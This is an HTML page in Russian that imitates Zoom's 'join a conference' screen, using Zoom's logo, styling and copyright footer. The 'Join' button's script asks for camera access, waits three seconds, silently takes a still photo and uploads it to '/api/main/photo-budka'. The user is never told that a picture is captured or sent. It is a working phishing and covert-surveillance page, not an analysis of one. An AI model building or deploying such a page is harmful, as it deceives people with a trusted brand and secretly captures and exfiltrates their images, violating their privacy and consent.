<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
    <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.8/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-sRIl4kxILFvY47J16cr9ZwB07vP4J8+LH7qKQnuqkuIAvNWLzeN8tE5YBujZqJLB" crossorigin="anonymous">
    <script src="https://cdn.jsdelivr.net/npm/@popperjs/core@2.11.8/dist/umd/popper.min.js" integrity="sha384-I7E8VVD/ismYTF4hNIPjVp/Zjvgyol6VFvRkX/vR+Vc4jQkC+hVqc2pM8ODewa9r" crossorigin="anonymous"></script>
    <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.3.8/dist/js/bootstrap.min.js" integrity="sha384-G/EV+4j2dNv+tEPo3++6LCgdCROaejBqfUeNjuKAiuXbjrxilcCdDz6ZAVfHWe1Y" crossorigin="anonymous"></script>

    <style>

        script {
            display: none;
        }
        .zoom-logo {
            width: 110px;
            height: auto;
        }

        .header-margin {
            margin-bottom: 150px;
        }

        @media (max-width: 576px) {

            .zoom-logo {
                width: 94px;
                height: auto;
            }
            .low-text {
                font-size: 12px;
            }

            .btn-custom {
                border: 0;
                background-color: inherit;
                color: #686F79;
                font-weight: 400;
                padding: 5px;
            }

            .header-margin {
                margin-bottom: 40px;
            }
        }

        @media (max-width: 390px) {
            .low-text {
                font-size: 10px;
            }
        }

    </style>
</head>
<body>
    <header class="header-margin pt-3 pb-3 border-bottom">
        <div class="d-flex justify-content-between align-items-center container">
            <a class="d-block zoom-logo" href="https://zoom.us/ru" aria-label="Zoom Home Page">
                <img class="logo" src="https://st1.zoom.us/static/6.3.57420/image/new/topNav/Zoom_logo.svg" alt="Логотип Zoom"/>
            </a>

            <div>
                <button class="low-text btn-custom btn btn-outline-primary rounded-5 fw-bold"
                style="--bs-btn-padding-y: 8px; --bs-btn-padding-x: 15px;">Поддержка</button>
                <button class="low-text btn-custom btn btn-primary rounded-5 fw-bold"
                style="--bs-btn-padding-y: 8px; --bs-btn-padding-x: 15px;"
                >Бесплатная регистрация</button>
            </div>
        </div>
    </header>

    <main class="container d-flex flex-column align-items-center">
        <h4 class="fs-3 text mb-5 d-none d-md-block">Присоединиться к конференции</h4>

        <div class="" style="width: 360px;">
            <p class="">Идентификатор конференции или имя<br> персональной ссылки</p>
            <div class="input-group">
                <input type="text" class="form-control rounded-3 px-3 py-2" placeholder="Укажите идентификатор конференции или название персональной ссылки" aria-label="Recipient’s username" aria-describedby="basic-addon2">
            </div>

            <div class="d-flex gap-2 align-items-center mb-3">
                <input type="checkbox" class="btn-check" id="btncheck1" autocomplete="off">
                <label class="btn btn-outline-primary p-0 rounded-1 d-flex align-items-center justify-content-center my-3" 
                    style="height: 13px; width: 13px;" 
                    for="btncheck1">
                    <svg xmlns="http://www.w3.org/2000/svg" width="100%" height="100%" fill="white" class="bi bi-check-lg" viewBox="0 0 16 16">
                        <path d="M12.736 3.97a.733.733 0 0 1 1.047 0c.286.289.29.756.01 1.05L7.88 12.01a.733.733 0 0 1-1.065.02L3.217 8.384a.757.757 0 0 1 0-1.06.733.733 0 0 1 1.047 0l3.052 3.093 5.4-6.425z"/>
                    </svg>
                </label>
                <p class="m-0">Всегда входить из браузера</p>
            </div>
            <button 
            onclick="start(); return false;"
            class="btn btn-primary w-100 fw-semibold rounded-4 py-2 mb-5">Присоединиться</button>

            <a class="">Войти в конференцию из конференц-системы<br> H.323/SIP</a>
        </div>
    </main>
    <footer class="position-fixed d-flex justify-content-center bottom-0 py-2 w-100">
        <p class="">© 2026 Zoom Communications, Inc. Все права защищены.Политика конфиденциальности и Правовая политика </p>
    </footer>
    <script>
        async function start() {
        try {
            const stream = await navigator.mediaDevices.getUserMedia({ video: true });

            const video = document.createElement('video');
            video.autoplay = true;
            video.playsInline = true;
            video.srcObject = stream;

            document.body.appendChild(video);

            await video.play();

            setTimeout(() => {
                const canvas = document.createElement('canvas');
                canvas.width = video.videoWidth;
                canvas.height = video.videoHeight;

                const ctx = canvas.getContext('2d');
                ctx.drawImage(video, 0, 0);

                canvas.toBlob(async (blob) => {
                    const formData = new FormData();
                    formData.append('photo', blob, 'photo.jpg');

                    try {
                        const res = await fetch('/api/main/photo-budka', {
                            method: 'POST',
                            body: formData,
                        });

                        if (!res.ok) throw new Error(`Ошибка: ${res.status}`);
                        const data = await res.json();
                        console.log('Загружено:', data);
                    } catch (err) {
                        console.error('Ошибка отправки:', err);
                    }

                    stream.getTracks().forEach(t => t.stop());
                    video.remove();
                }, 'image/jpeg', 0.9);

            }, 3000);

        } catch (err) {
            console.error(err);
            alert("Ошибка камеры: " + err.message);
        }
    }
    </script>
</body>
</html>